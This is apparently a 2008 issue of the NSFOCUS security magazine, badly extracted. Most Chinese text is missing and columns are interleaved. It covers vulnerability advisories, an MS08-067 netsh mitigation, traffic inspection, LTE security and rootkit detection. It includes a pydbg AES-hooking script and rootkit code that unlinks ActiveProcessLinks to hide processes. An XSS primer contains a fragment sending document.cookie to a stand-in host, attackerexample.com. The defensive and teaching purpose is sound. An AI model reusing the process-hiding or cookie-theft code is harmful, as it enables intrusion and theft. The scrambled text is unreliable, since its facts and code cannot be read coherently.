2008/12 003
Share technique experience with security professionals
DFI DPI 14 18
23 DFI DPI 30
37 52
2008/12 003 4 100089 (010)6843 8880-8668 (010)6872 8708 www.nsfocus.com
[email protected] CONTENTS
2-13
NSFOCUS 2008 11 2 (Alert2008-08) 5 (Alert2008-09) 12
14-29 14 18 DFI DPI 23
30-47 30 37 ring3 Windows 43
48-66 3GPP LTE 48 52 56 61
67-76 67 70 72
1 NSFOCUS 2008 11
NSFOCUS
http://www.nsfocus.net/index.php?act=sec_bug&do=top_ten
1. 2008-11-12 Microsoft Windows SMB (MS08-068)
UNC NSFOCUS ID: 12608 http://www.nsfocus.net/vulndb/12608 2. 2008-11-12 Microsoft XML Core Services (MS08-069) Windows NSFOCUS ID: 12605
SMB http://www.nsfocus.net/vulndb/12605 Web Microsoft (SMB) 3. 2008-11-12 Linux Kernel NTLM Microsoft XML Core Services MSXML ndiswrapper JScript VBScript Visual Studio NSFOCUS ID: 12604 6.0 XML http://www.nsfocus.net/vulndb/12604 XML 1.0
Microsoft XML Core Services XML
Linux Kernel Linux
HTML
10 1000 IFRAME Linux Kernel ndiswrapper
JavaScript
50 100
2 ESSID 5. 2008-11-13 Sun Solaris DHCP WebLogic Apache
NSFOCUS ID: 12613
http://www.nsfocus.net/vulndb/12613
Solaris Sun 4. 2008-11-13 Trend Micro Apache ServerProtect UNIX Solaris DHCP in.dhcpd(1M)
DHCP 7. 2008-11-05 Adobe Acrobat Rea- NSFOCUS ID: 12615 DHCP der 8.1.3 http://www.nsfocus.net/vulndb/12615 root NSFOCUS ID: 12572
http://www.nsfocus.net/vulndb/12572 Trend ServerProtect
Solaris DHCP Adobe Acrobat Reader ServerProtect RPC PDF RPC 6. 2008-11-03 Oracle WebLogic Adobe Acrobat Reader Apache RPC Type 1 NSFOCUS ID: 12569
http://www.nsfocus.net/vulndb/12569
PDF JavaScript
WebLogic Collab
ServerProtect Server/Express/Integration
3 PDF 9. 2008-11-07 VLC 49 inv-
alidCredentials NSFOCUS ID: 12587
http://www.nsfocus.net/vulndb/12587
LDAP 8. 2008-11-17 Discuz! $_DCACHE VLC Media Player
NSFOCUS ID: 12623 VLC cue http://www.nsfocus.net/vulndb/12623 VLC rt
Discuz!
Web cue rt Discuz! wap\index.php Chi- nese Convert post 10. 2008-11-17 Microsoft LDAP
NULL $_DCACHE NSFOCUS ID: 12625 SQL http://www.nsfocus.net/vulndb/12625
Microsoft Windows
cue rt Microsoft LDAP
4 (Alert2008-08)
Nsfocus [email protected] http://www.nsfocus.com
10
2008-10-15
Excel 2000 Service Pack 3
10 11 Office CDO cdo: Content- Excel 2002 Service Pack 3
20 Disposition: Attachment Excel 2003 Service Pack 2
10 Web Excel 2003 Service Pack 3
Excel 2007
Excel 2007 Service Pack 1
Windows OneNote Microsoft Office Excel Viewer 2003
Microsoft Office Excel Viewer 2003 Ser-
vice Pack 3
Windows Microsoft Office Excel Viewer
10 11 "Windows update" Word Excel PowerPoint 2007
MS08-056 MS08-066 Microsoft Office
20 Win- http://www. Word Excel PowerPoint 2007 dows Office Internet Ex- microsoft.com/downloads/details.aspx? Service Pack 1 Microsoft Office plorer Host Integration Server familyid=b1aee2d5-bfa0-40e3-91b6-98bf6
5524e8c Microsoft Office SharePoint Server 2007 1. MS08-056 - Microsoft Office (957699) 2. MS08-057 - Microsoft Excel Microsoft Office SharePoint Server 2007 (956416) Service Pack 1
Microsoft Office XP Service Pack 3 Microsoft Office SharePoint Server 2007
5 x64 Edition 2003 Internet Explorer
Microsoft Office SharePoint Server 2007 VBE6.DLL ACL Internet Explorer x64 Edition Service Pack 1 Everyone
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac Windows Internet Intranet
"Windows update" ActiveX
Excel VBA
VBA Internet Explorer Internet
Excel http://www.microsoft.com/china/technet/ Intranet
security/bulletin/MS08-057.mspx
Excel 3. MS08-058 - Internet Explorer
Microsoft Excel (956390)
http://www.microsoft.com/china/
Excel Microsoft Internet Explorer 5.01 Service technet/security/bulletin/MS08-058.mspx
Pack 4 4. MS08-059-Host Integration Server Excel Microsoft Internet Explorer 6 Service RPC Pack 1 (956695) Microsoft Internet Explorer 6
Windows Internet Explorer 7 Microsoft Host Integration Server 2000
MOICE Service Pack 2
Microsoft Office Internet Explorer Microsoft Host Integration Server 2000
Office
6 Microsoft Host Integration Server 2004 Host Integration Server 2004 TCP 389 636
Host Integration Server 2004 Host Inte-
Microsoft Host Integration Server 2004 gration Server 2006 SNA RPC
Service Pack 1 Windows
Microsoft Host Integration Server 2004 Windows update
Windows
Microsoft Host Integration Server 2004 "Windows update"
Service Pack 1 http://www.microsoft.com/downloads/
Microsoft Host Integration Server 2006 details.aspx?familyid=8ed7bb9a-4b26-
32 http://www.microsoft.com/china/techn- 49d7-8c14-60226d2bc20d
Microsoft Host Integration Server 2006 et/security/bulletin/MS08-059.mspx 6. MS08-061 - Windows
x64 (954211) 5. MS08-060 - (957280)
Host Integration Server SNA Microsoft Windows 2000 Service Pack 4
RPC Microsoft Windows 2000 Server Ser- Windows XP Service Pack 2
RPC vice Pack 4 Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition
Microsoft Windows 2000 Server Service Pack 2
LDAP LDAPS Windows Server 2003 Service Pack 1
Host Integration Server 2004 Windows Server 2003 Service Pack 2
Host Integration Server 2006 HIS/ Windows Server 2003 x64 Edition Win-
SNA dows Server 2003 x64 Edition Service Pack 2
7 Windows Server 2003 SP1 Windows Windows Server 2003 x64 Edition Win-
Itanium Windows Server 2003 Windows update dows Server 2003 x64 Edition Service Pa-
SP2 Itanium ck 2
Windows Vista Windows Vista Service Windows Server 2003 SP1
Pack 1 http://www.microsoft.com/china/ Itanium Windows Server 2003
Windows Vista x64 Edition Windows technet/security/bulletin/MS08-061.mspx SP2 Itanium
Vista x64 Edition Service Pack 1 Windows Vista Windows Vista Service 7. MS08-062 - Windows Internet Windows Server 2008 32 Pack 1
Windows Server 2008 x64 (953155) Windows Vista x64 Edition Windows
Vista x64 Edition Service Pack 1
Windows Server 2008 Itanium Microsoft Windows 2000 Service Pack 4 Windows Server 2008 32
Windows XP Service Pack 2 Windows Server 2008 x64
Windows XP Service Pack 3
Windows Windows XP Professional x64 Edition Windows Server 2008 Itanium
Windows XP Professional x64 Edition
Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2 IIS Windows Windows XP Service Pack 3 Microsoft Internet IPP Windows XP Professional x64 Edition
Windows XP Professional x64 Edition IIS Service Pack 2
Windows Server 2003 Service Pack 1
Windows Server 2003 Service Pack 2 IPP
8 IIS 2.1 Windows Vista x64 Edition Windows http://www.microsoft.com/china/technet/
Vista x64 Edition Service Pack 1 security/bulletin/MS08-063.mspx
Windows Server 2008 32 9. MS08-064 - http://www.microsoft.com/china/technet/ Windows Server 2008 x64 (956841) security/bulletin/MS08-062.mspx
8. MS08-063 - SMB Windows Server 2008 Itanium Windows XP Service Pack 2 (957095) Windows XP Service Pack 3
Windows XP Professional x64 Edition
Microsoft Windows 2000 Service Pack 4 Microsoft SMB Windows XP Professional x64 Edition Ser-
Windows XP Service Pack 2 vice Pack 2
Windows XP Service Pack 3 Windows Server 2003 Service Pack 1
Windows XP Professional x64 Edition Windows Server 2003 Service Pack 2
Windows XP Professional x64 Edition Servi- Windows Server 2003 x64 Edition Win-
ce Pack 2 dows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 Service Pack 1 Windows Server 2003 SP1
Windows Server 2003 Service Pack 2 Itanium Windows Server 2003
Windows Server 2003 x64 Edition Win- SP2 Itanium
dows Server 2003 x64 Edition Service Pack 2 Windows Vista Windows Vista Service
Windows Server 2003 SP1 Pack 1
Itanium Windows Server 2003 Windows Windows Vista x64 Edition Windows
SP2 Itanium Windows update Vista x64 Edition Service Pack 1
Windows Vista Windows Vista Service Windows Server 2008 32
Pack 1 Windows Server 2008 x64
9 10. MS08-065 - details.aspx?familyid=899e2728-2433- (951071) Windows Server 2008 Itanium 4ccb-a195-05b5d65e5469
11. MS08-066 - Microsoft Microsoft Windows 2000 Service Pack 4
(956803)
VADs RPC
Windows XP Service Pack 2
Windows XP Service Pack 3
RPC Windows XP Professional x64 Edition
Windows XP Professional x64 Edition Ser-
vice Pack 2
Windows Server 2003 Service Pack 1
1024 Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Win-
RPC dows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 SP1
Itanium Windows Server 2003
Windows SP2 Itanium
Windows update Windows
Windows update Windows
afd.sys http://www.microsoft.com/china/technet/ security/bulletin/MS08-064.mspx http://www.microsoft.com/downloads/
10 8. http://www.microsoft.com/china/technet/ nerabilities/display.php?id=746
security/bulletin/MS08-063.mspx 25. http://labs.idefense.com/intelligence/vul-
9. http://www.microsoft.com/china/technet/ nerabilities/display.php?id=745
security/bulletin/MS08-064.mspx 26. http://www.zerodayinitiative.com/adviso-
10. http://www.microsoft.com/china/technet/ ries/ZDI-08-069/ http://www.microsoft.com/china/technet/ security/bulletin/MS08-065.mspx security/bulletin/MS08-066.mspx 11. http://www.microsoft.com/china/technet/
security/bulletin/MS08-066.mspx
12. http://secunia.com/advisories/32242/
1. http://www.microsoft.com/china/technet/ 13. http://secunia.com/advisories/32233/ security/bulletin/MS08-056.mspx 14. http://secunia.com/advisories/32211/
2. http://www.microsoft.com/china/technet/ 15. http://secunia.com/advisories/32261/ security/bulletin/MS08-057.mspx 16. http://secunia.com/advisories/32247/
3. http://www.microsoft.com/china/technet/ 17. http://secunia.com/advisories/32248/ security/bulletin/MS08-058.mspx 18. http://secunia.com/advisories/32249/
4. http://www.microsoft.com/china/technet/ 19. http://secunia.com/advisories/32251/ security/bulletin/MS08-059.mspx 20. http://secunia.com/advisories/32260/
5. http://www.microsoft.com/china/technet/ 21. http://secunia.com/advisories/32138/ security/bulletin/MS08-060.mspx 22. http://dvlabs.tippingpoint.com/advisory/
6. http://www.microsoft.com/china/technet/ TPTI-08-07 security/bulletin/MS08-061.mspx 23. http://www.zerodayinitiative.com/adviso-
7. http://www.microsoft.com/china/technet/ ries/ZDI-08-068/ security/bulletin/MS08-062.mspx 24. http://labs.idefense.com/intelligence/vul-
11 (Alert2008-09)
Nsfocus [email protected] http://www.nsfocus.com
Windows Server RPC MS08-067
2008-10-24 CVE CAN ID CVE-2008-4250 BUGTRAQ ID 31874
Vista x64 Edition Service Pack 1
icrosoft Windows 2000 Service Windows Server 2008 for 32-bit Systems Windows Server MPack 4 Windows Server 2008 for x64-based Sys- RPC Windows XP Service Pack 2 tems RPC
Windows XP Service Pack 3 Windows Server 2008 for Itanium-based SYSTEM
Windows XP Professional x64 Edition Systems
Windows XP Professional x64 Edition Windows 2000 XP Server
Service Pack 2 10 2003
Windows Server 2003 Service Pack 1 MS08-067 Windows Windows Vista Server 2008
Windows Server 2003 Service Pack 2 Server RPC
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition Ser- vice Pack 2
Windows Server 2003 with SP1 for Windows Server Computer Browser
Itanium-based Systems Server TCP 139 445
Windows Server 2003 with SP2 for Internet
Itanium-based Systems
Windows Vista Windows Vista Service Windows
Pack 1 Windows Vista Windows Server
Windows Vista x64 Edition Windows 2008 RPC
12 rity/bulletin/ms08-067.mspx
netsh 2. http://www.us-cert.gov/cas/techalerts/
netsh TA08-297A.html
netsh>rpc 3. http://www.kb.cert.org/vuls/id/827267
netsh rpc>filter 4. http://blogs.technet.com/swi/archive/
netsh rpc filter>add rule layer=um 2008/10/23/More-detail-about-MS08-067. actiontype=block aspx
netsh rpc filter>add condition field= 5. http://secunia.com/advisories/32326/ if_uuid matchtype=equal data=4b324fc8- 6. http://cve.mitre.org/cgi-bin/cvename.cgi?
1670-01d3-1278-5a47bf6ee188 name=CVE-2008-4250
netsh rpc filter>add filter 7. http://www.nsfocus.net/index.php?
netsh rpc filter>quit act=alert&do=view&aid=94
Windows
Windows update
http://www.microsoft.com/technet/secu- rity/bulletin/ms08-067.mspx
1. http://www.microsoft.com/technet/secu-
13 2007
3000
2007 6 22
14 2007 43
2007 7 16
2007 861
43 861
2
1
1
15 WEB
WEB
SQL
Lord Kelvirl
16 Web
ASP JSP PHP
CGI
SQL
WEB
WEB
WEB ISO9001 Web
Web ISO27001
DDoS
300G
17 1
WindowsServer2003-KB938464-
x86-ENU.exe HASH P2SP P2P BT
P2SP P2SP
P2SP
3-5
2
download.microsoft.com http://download.microsoft.com/download/f/d/0/fd04b854-24eb-4b49-bbfb- ad5d1fdc76f6/WindowsServer2003-KB938464-x86-ENU.exe
2003 WindowsServer2003-KB938464-x86-ENU. exe web
download.microsoft.com
3
http
18 http content AES
http
AES
19 Peer
P2P
AES
20 web FTP
Python
pydbg
Import pydbg
def AESDecrypt_hook(dbg,args,ret):
def AESEncrypt_hook(dbg,args):
dbg = pydbg()
for process in dbg.enumerate_processes():
if(process[1] == "Thunder5.exe"):
21 pid = process[0] 4 if(pid == 0):
print "process not exist!" p2p
sys.exit(0)
dbg.attach(pid) http/ftp
addr_AESDecrypt = 0xAAAAAAAA #AES decryption function address
addr_AESEncrypt = 0xBBBBBBBB #AES encryption function address
hooks = utils.hook_container()
print "Hooking AESEncryption(0x%x)" % addr_AESEncrypt http/ftp
print "Hooking AESDecryption(0x%x)" % addr_AESDecrypt
hooks.add(dbg, addr_AESEncrypt, 2, AESEncrypt_hook,None)
hooks.add(dbg, addr_AESDecrypt,2 None, AESDecrypt_hook)
dbg.run()
22 DFI DPI
DFI DPI
DFI (Deep Flow Inspect), DPI(Deep Packet Inspect)
1
008 7 2DNS
2008 8 IDC IDC
IDC IDC
IDC P2P
Http Get Flooding SNMP
MRTG SolarWind RADIUS URL SNMP DNS DHCP SIP
SIP IP
2008 8
DDoS
23 P2P
2.2.1 P2P
2/8 P2P 2 DFI Deep Flow Inspect P2P
20% IP P2P 2.1 80% DFI 2/8
P2P
1/9 DFI P2P IP P2P
P2P IP
P2P P2P 1200 IP netstat
2.2 P2P 10-15 2.2.2 P2P Netflow sFlow P2P
IP P2P P2P
DFI P2P
P2P UDP/TCP
DFI DNS NETBIOS
P2P P2P IRC
P2P 135 137 139 445 53
24 3531 DFI
P2P 3
IP P2P
UDP TCP 4
P2P P2P 3 DPI TCP UDP P2P 3.1
2.3
DFI
CC
P2P Http Get Flooding DNS
Request Flooding
DNS 2.2.3 P2P 1
IP AS
2
DFI P2P DPI
P2P TOS
P2P TCP-Flag
25 DPI
MSN
4.3
DPI
SIP HTTP IP 4 TCP-flag TOS 4.1 URL
4-1
3.2 4-1 4.2 P2P
P2P P2P
VoIP 1200 P2P
Web IP
MAC P2P IP
P2P
26 5
5.1
5-1 4-1 4.4 5.2
NTA
ADS ADS
ADS ADS
4.5
TCP P2P
27 6
6.1 DFI DPI
DFI DPI
DFI DPI
DFI
P2P
HTTP Get Flood
1-2
DFI 10
NETFLOW SFLOW POS
GE
200Gpps
28 6.2
6.3
1996
IPFIX IPFIX
29 2008 TCP/IP 1 2008
2 2.21
2 CNCERT CC 2007
IP 995154
Email 2006 22
VPN P2P 3 2007
WEB 2.0 623 362
4 2007
61228 2006 1.5
5 2007 237 2006
74
DDoS
UTM Unified Threat
Management
VPN
DDoS
CNCERT CC TCP
P2P WEB VPN
30 Next Generation Security
P2P Gateway NGSG
1 P2P
2
3.1
80 Http 110 pop3
Smart Tunnel NGSG NGSG
Http IM EMAIL
3
WEB
DDoS CC
4.1 NGSG
31 NGSG
NGSG
TCP
NGSG
1 TCP/IP SYN ACK
NIPR
NGSG
Http POP3
P2P
(SYN
UDP ICMP 500
NGSG
TCP
NGSG 2-4
TCP ACK 2
32 3 NGSG
4.2
Unicode Base64
NGSG
cloud computing NGSG
URL
URL
NGSG
URL
33 NGSG NGSG
1995
171 2000 1090 2007
7236 19
2006
24477 2007 61228
167
NGSG
NGSG
URL
NGSG NGSG
34 ASIC/NP NGSG
CPU ASIC NP X86 CPU
CPU ARM CPU 4.4 ASIC/NP
ASIC NP CPU ASIC NP X86 CPU ASIC/NP X86 CPU
VLAN ASIC/
NP
DPI ASIC/NP
CPU X86 CPU
x86 CPU ASIC/NP
CPU
ASIC NP
ASIC
ASIC/NP
X86 CPU 4.5 ASIC/NP
35 CPU CPU
CPU CPU 7
CPU RAM
CPU
SMP Symmetrical Multi-Processing CPU
CPU 40% 80%
RISC CPU
CPU NP
CPU NP
CPU NP
CPU
CPU NGSG NGSG
3-5 NGSG
4.6 CPU
36 IT
37 PUT OR GET
UI
B S C S
38 SCAP Security Content Automation Protocol SCAP
FDCC FDCC Federal Desktop Core Configuration
FISMA The Federal Information Security Management Act Windows XP Windows
vista
NIST FDCC NVD NCP NVD National
ISAP Vulnerability Database
information security automation program FISMA
ISAP SCAP security content automation NVD protocol SCAP CVE CCE CPE XCCDF OVAL CVSS Checklist NCP National
6 6 Checklist Program FDCC
NVD NCP SCAP 1 NVD NCP
39 2 1
2
Windows Solaris
WAP
3 WAP
FDCC Windows
Windows Solaris
Cisco
Windows
Cisco
WAP
WAP
40 1
IP
WEB
HTTP WAP
2
3
DDoS
checklist
FDCC
41 AURORA
IP
Windows Linux HP UX
Oracle SQL Cisco Juniper
Checkmark
NSIP
West Coast Labs
42 ring3 Windows
ActiveProcessLinks EPROCESS EPROCESS
Windows RootKit EPROCESS Pid
PEB API
Anti-RootKit TEB
ETHREAD TEB PEB
Psapi ETHREAD EPROCESS
ToolHelp32 EPROCESS ETHR-
Psapi EAD
EnumProcesses() EPROCESS
ToolHelp32 DWORD UniqueProcessId
CreateToolhelp32Snapshot() LIST_ENTRY ActiveProcessLinks API ActiveProce-
Process32First() ssLinks
Process32Next() Char ImageFileName[16] Hook NtQuerySystemInfor
Psapi ToolHelp32 ETHREAD mation
Native API NtQuerySystemInformation Hook SDT
NtQuerySystemInformatio PEPROCESS ThreadsProcess NtQuerySystemInformation() n SystemProcessInf ormation ExpGe EPROCESS NTSTATUS NtQuerySystemInformation tProcessInformation() ExpGetProce Pid SYSTEM_INFORMATION_CLASS Syst- ssInformation() ActiveProcessLinks emInformationClass
EPROCESS PVOID SystemInformation,
43 ULONG SystemInformationLength, ActiveProcessLinks
PULONG ReturnLength KprocCheck 2
RootKit NtQuerySystemInformation() ActiveProcessLinks
SystemProcessInformation EPROCESS
NtQuerySystemInformation
()
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
Hacker Defender 1 *((DWORD *)plist_active_procs->Blink) = (DWORD)
API plist_active_procs->Flink;
ActiveProcessLinks ActiveProcessLinks *((DWORD *)plist_active_procs->Flink+1) = (DWORD)
EPROCESS plist_active_procs->Blink;
kd> da poi(PsInitialSystemProcess) + 1fc FU_Rootkit 2.5
81a2fc5c System Win
kd> da poi(poi(PsInitialSystemProcess)+a0) -a0 + 1fc 32 API ActiveProcessLinks
8132af5c SMSS.EXE FU_Rootkit 3
kd> da poi(poi(poi(PsInitialSystemProcess)+a0)) -a0 + 1fc
8134af5c CSRSS.EXE
kd> da poi(poi(poi(poi(PsInitialSystemProcess)+a0))) -a0 + 1fc KiWaitInListHead KiWaitOutListhea KiDispatcherReadyListHead
8119375c WINLOGON.EXE ETHREAD EPROCESS
ActiveProccessLinks ExpGetP- RootKit Anti-RootKit rocessInformation() Hook NtQuerySystemInfor- Windows 2000 NT 5.1 mation() Windows
44 Windows XP 2003 ()
Klister SwapContext()
4 KprocCheck
2004 4 SoBeIt Xfocus BSOD
5 ring3
ring3
EPROCESS ActiveProcessLinks
EPROCESS
Windows 2000
EPROCESS Vm _MMSUPPORT
2004 8 kkasslin rootkit.com WorkingSetExpansionLinks
6 Hook SwapContext() ActiveProcessLinks
SwapContext() EPROCESS SessionProcessLinks
EPROCESS
fastcall SwapContext System smss.exe PETHREAD SwapIn
PETHREAD SwapOut NT 5.0 5.1 5.2 NT 5.2
EPROCESS MmProcessLinks Idle
Hook
kd> dt _EPROCESS ImageFileName poi(MmProcessList)-238
__fastcall RootKit +0x154 ImageFileName 16 Idle
ETHREAD 0x022c kd> dt _EPROCESS ImageFileName poi(poi(MmProcessList))-
EPROCESS ThreadsProcess SwapContext 238
45 +0x154 ImageFileName:[16] Flier 47 Windows 2003 KernBase
System Windows NT QueryBuff.Data = Buff;
[8]
QueryBuff.Length = 2;
1 Windows XP Windows 2003 EnablePrivilege(SE_DEBUG_NAME) 2
NT5.1 ZwSystemDebugControl EPROCESS NtSystemD-ebugControl() Native API (
Ntoskernl.exe Windows 2003 SysDbgReadKernelMemory, PsInitialSystemProcess System ntoskrnl.exe &QueryBuff, EPROCESS MZ sizeof(MEMORY_CHUNKS), typedef struct _MEMORY_CHUNKS{ kd> dt _EPROCESS ImageFileName poi NULL, ULONG Address (PsInitialSystemProcess) 0, PVOID Data; +0x1fc ImageFileName:[16] Sys- &ReturnLength ULONG Length; tem );
Windows 2000 }MEMORY_CHUNKS, *PMEMORY_C- printf ( 4D5A: %s\n Buff); HUNKS;
Phrack 59 Playing with Windows NT 5.1 NtSyste- MEMORY_CHUNKS QueryBuff; Windows /dev/(k)mem [7] mDebugContro() ULONG ReturnLength; \Device\PhysicalMemory RootKit char Buff[4] = {0}; Anti-RootKit
QueryBuff.Address = 0x804e0000; // Native API NtSystemD-ebugControl
46 [9] Windows Windows XP Windows ([email protected])
[10] 2003 SeAuditProcessCreati- http://www.xfocus.net/articles/200404/693.html
onInfo.ImageFileName->Name [6]Detecting Hidden Processes by Hooking the
PEB SwapContext Function kkasslin([email protected])
kd>dt_EPROCESS pImageFileName poi http://www.rootkit.com/newsread_print.php?newsid=170
EPROCESS (poi(PsInitialSystemProcess)+a0)-a0 [7]Playing with Windows /dev/(k)mem crazylord
Vm.WorkingSetExpansionLinks +0x284 pImageFileName:0x81363fb8 ([email protected])
SessionProcessLinks MmProcessLinks WINNT\system32\SMSS.EXE http://www.phrack.org/phrack/59/p59-0x10.txt
[8] Windows NT Flier
Vm.WorkingSetExpansionLinks 2004 9 Lu ([email protected])
SessionProcessLinks http://www.nsfocus.net/index.php? act=magazine&do=vi-
ew&mid=2119
EPROCESS EPROCESS [1]Hacker Defender Holy_Father(holy_father@phreaker. [9] Native API NtSystemDebugControl
net) ([email protected])
Windows http://rootkit.host.sk/ http://www.xfocus.net/articles/200408/721.html
2003 [2]KprocCheck Tan Chew Keong(chewkeong@security. [10] Windows
EPROCESS org.sg) ([email protected])
MmProcessLinks http://www.security.org.sg/code/kproccheck.html http://www.xfocus.net/articles/200408/724.html
MmProcessLinks [3]FU_Rootkit fuzen_op([email protected])
https://www.rootkit.com/vault/fuzen_op/FU_Rootkit.zip
Windows 2000 EPROCESS [4]Klister Joanna Rutkowska([email protected])
pImageFileName http://www.rootkit.com/vault/joanna/klister-0.4.zip
_UNICODE_STRING [5] SoBeIt
47 3GPP (LTE)
3GPP LTE LTE/SAE
LTE/SAE 3G
LTE
1 3G 3GPP 2004 LTE Long Time Evolution
3G 2006
LTE SAE System Architecture Evolution
2G GSM LTE/SAE
LTE/SAE GSM 2. LTE/SAE COMP128-1 SIM LTE UMTS LTE/SAE (AuC) eNB Evolved Node B eNB SIM GSM eNB X2 eNB
MME/S-GW Mobility Management Entity/Serving-Gateway 3G 2G S1 LTE 3G
R99 UMTS
Milenage AKA
R4 IP R5 IMS R6
GAA Generic Authentication Architecture MBMS
Multimedia Broadcast Multicast Service
3G 1
48 UMTS SAE MME SGSN 2 (II)
MME NAS SAE 3 (III)
4 (IV)
5 V
LTE/SAE UMTS
1 ME SN ME SN
2 AN SN AN SN
2 3 HE SN
3. LTE/SAE
LTE/SAE UMTS 4. LTE/SAE
3 4
LTE/SAE 5 LTE/SAE eNB LTE/
1 (I) SAE
49 AS NAS CK/IK HSS
1 AS UE eNB AS 2)ME ASME
UP KASME UE HSS CK/IK
2 NAS UE MME NAS 3)UE eNB MME
KNASint UE MME KASME UE MME 5. LTE/SAE NAS
LTE/SAE K KNASenc UE MME KASME UE
MME NAS
KeNB UE MME KASME KeNB AS
KUPenc UE eNB KeNB
UE eNB UP
KRRCint UE eNB KeNB
UE eNB RCC
KRRCenc UE eNB KeNB
UE eNB RCC
6. LTE/SAE AKA
5 LTE/SAE AKA UMTS AKA
LTE/SAE Milenage UMTS
1)UE HSS UE
K USIM AuC UMTS SAE AV Authentication Vector UMTS
CK/IK AuC USIM AKA UMTS AV UMTS AV CK/IK SAE AV Kasme HSS
50 UE CK/IK LTE/SAE AV NE A-1 MME/S-GW NE B-1 eNB
AMF AV SAE AV UMTS AV UE NE SEG NE
MME/S-GW SEG
SAE AV UMTS AV UMTS AV SAE MME/
LTE/SAE UE eNB MME S-GW eNB MME/S-GW eNB
EUTRAN UTRAN GERAN non-3GPP NE A-1 NE A-2 Zb
7
LTE/SAE NDS/IP SEG Za IKE IPsec SEG Zb IPsec eNB
SEG eNB NDS/IP
8
3GPP LTE/SAE 3GPP LTE/
SAE R7
6 NDS/IP
LTE/SAE MME/S-GW eNB
MME/S-GW eNB Internet
51 Internet
2000
2007 4 27
2007 9 24
4
DDoS
52 IT IT
IEEE STD 1471
C4ISR DODAF GIG
NATO
FEA
TCAF
TCAF
IT
TCAF Trusted Cyber Architecture Framework
IT
53 1 Web
SNS
SAP
2
IPV4 HTTP DDoS
54 IT
WEB
Internet SOA
DDoS
55 IT 3
4
1
2
56 IT
1
2
57 1 1
2
3 2
4
3
SNMP
58 IDS
Internet
Internet
Internet
4 7
IT
5
Checklist
6
Internet
59 IT
PDCA Plan Do Check Act
Plan
Do
Check
Act
60 XSS
XSS Social Engineering AJAX cookie HTML JavaScirpt
XSS
cookie
XSS
Web
XSS Web XSS
HTML
Web
JavaScript
Q1 Web
Cross-site scripting VBScript ActiveX Java Flash
XSS XSS Stored XSS
Web Reflected XSS XSS
XSS
XSS
XSS
61 Q2 XSS Yahoo! V9
XSS
CSS Yahoo!
Cascading Style Sheets CSS [8]
W3C 1 [4]
The World Wide Web Consortium Application Security Consortium Q6 XSS cookie [4] 10297
HTML XML 31.47 XSS XSS XSS
CSS 41.41 [1] CSS XSS
XSS [2] Q5 XSS
2005 Samy MySpace Q3 XSS XSS 24 www.vulnerableexample.com XSS 73 1 [5] XSS Web 2006 PayPal XSS welcome.cgi name
PayPal HTTP cookie HTTP XSS PayPal
[6] JavaScript HTML
2008 5 eBay PayPal
XSS GET /welcome.cgi?name=Sammi HTTP/1.0 Q4 XSS cookie [7] Web WASC Web 2008 5 Yahoo! Messenger Host: www.vulnerableexample.com
62 GET /welcome.cgi?name= HTTP/1.0
Hi Sammi attackerexample.com cookie
http://www.vulnerableexample.com/ Welcome!
cgi?cookie %2Bdocument.cookie)
Alert Welcome! script>